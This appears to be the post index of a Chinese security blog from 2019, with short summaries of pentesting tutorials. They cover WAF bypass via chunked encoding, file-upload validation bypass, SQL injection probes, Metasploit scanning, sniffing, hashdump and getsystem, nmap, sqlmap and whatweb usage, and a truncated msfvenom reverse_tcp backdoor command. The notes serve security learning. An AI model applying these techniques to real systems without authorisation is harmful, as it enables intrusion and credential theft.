摘要: 一,畸形包绕过 1.先关闭burpsuite长度更新,为get请求,先使用bp的method转换为POST请求 2.get请求中空格使用%20代替,Connection改为keep-alive 二,分块传输绕过waf 1.先在数据包中添加Transfer-Encoding: chunked 2.数字 阅读全文
posted @ 2019-11-30 12:56 D虚拟现实 阅读(1066) 评论(0) 推荐(0) 编辑
摘要: 思维导图: 一,js验证绕过 1.我们直接删除代码中onsubmit事件中关于文件上传时验证上传文件的相关代码即可。 或者可以不加载所有js,还可以将html源码copy一份到本地,然后对相应代码进行修改,本地提交即可。 2.burp改包,由于是js验证,我们可以先将文件重命名为js允许的后缀名,在 阅读全文
posted @ 2019-09-25 15:22 D虚拟现实 阅读(855) 评论(0) 推荐(1) 编辑
摘要: 一,SQL注入的原理和防御机制 原理:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,达到欺骗服务器执行恶意的SQL命令 防御机制:1.对用户输入的数据类型做严格限制 2.使用预编译绑定变量的SQL语句 3.过滤特殊字符 4.数据库信息加密,使用数据库防火墙,web防火墙 阅读全文
posted @ 2019-06-10 19:19 D虚拟现实 阅读(2210) 评论(0) 推荐(0) 编辑
摘要: 相信学习Python的小伙伴都会接触到Geany这个轻量级的python文本编辑器吧,下面就是我对于安装Geany的一些小经验分享。 1:安装geany很简单,进入geany官网download下载相应版本即可。 2:安装好geany后,就对python环境的配置了,我的是windwos10的操作系 阅读全文
posted @ 2019-05-09 10:01 D虚拟现实 阅读(3244) 评论(0) 推荐(0) 编辑
摘要: 一,使用msf进行扫描nmap -v -sV ipsearch portscan二,msf SMB获取系统信息三,msf密码嗅探auxiliary/sniffer/psnuffle 四,msf进行 SNMP扫描snmp_login 检测是否存在可登陆snmp的主机snmp_enum 枚举snmp的账 阅读全文
posted @ 2019-10-03 11:51 D虚拟现实 阅读(281) 评论(0) 推荐(1) 编辑
摘要: 1.口令安全 search mysql_login ssh_login2.hash传递渗透hashdump3.内核提权getsystem4.后门生成 linux: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address 阅读全文
posted @ 2019-09-17 15:20 D虚拟现实 阅读(250) 评论(0) 推荐(0) 编辑
摘要: 1.namp 列举远程机器开放的端口--dns-servers 8.8.8.8(使用指定域名) -Pn:停止探测之前的ICMP请求,已达到不触发防火墙安全机制-p:指定端口or范围namp 识别目标机器上的服务指纹-T(1-5)加快探测速度-sC -sV -o :-sC:使用默认探测脚本 scrip 阅读全文
posted @ 2019-09-12 08:38 D虚拟现实 阅读(410) 评论(0) 推荐(0) 编辑
摘要: 1.sqlmap直接数据库,文件读取目标 -l ,-x(xml站点地图),-m(多行文本url),-r, url探测 --banner(t探测数据库), -g(Google)批量扫描注入2,使用post方式时可以指定分隔符 --pa'ram-del="&" , bp截取的文件参数后面加*如同 使用- 阅读全文
posted @ 2019-09-01 12:20 D虚拟现实 阅读(707) 评论(0) 推荐(0) 编辑
摘要: 常规扫描:whatweb www.baidu.com 批量扫描: whatweb -i /root/12.txt 详细回显扫描:whatweb -v www.baidu.com 加强扫描强度:whatweb -a 3 -v www.baidu.com 快速扫描本地主机: whatweb --no-e 阅读全文
posted @ 2019-05-30 18:56 D虚拟现实 阅读(512) 评论(0) 推荐(0) 编辑
摘要: 1.加入单引号 ’提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞。2.数字型判断是否有注入;语句:and 1=1 ;and 1=2 (经典)、' and '1'=1(字符型)结果:分别返回不同的页面,说明存在注入漏洞.分析:and 的意思是“和”如果没有过滤我们的语句,and 1=1就会被 阅读全文
posted @ 2019-05-19 16:20 D虚拟现实 阅读(12066) 评论(2) 推荐(0) 编辑
摘要: 最新struts-scan资源: https://www.cesafe.com/3486.html 一,将资源下载后,放入liunx系统中,并且需要具备python2的操作环境 二,打开终端使用如下命令即可对于struts工具进行使用(建议已经确定网站存在struts漏洞在进行工具利用) 1.pyt 阅读全文
posted @ 2019-05-18 11:40 D虚拟现实 阅读(803) 评论(0) 推荐(0) 编辑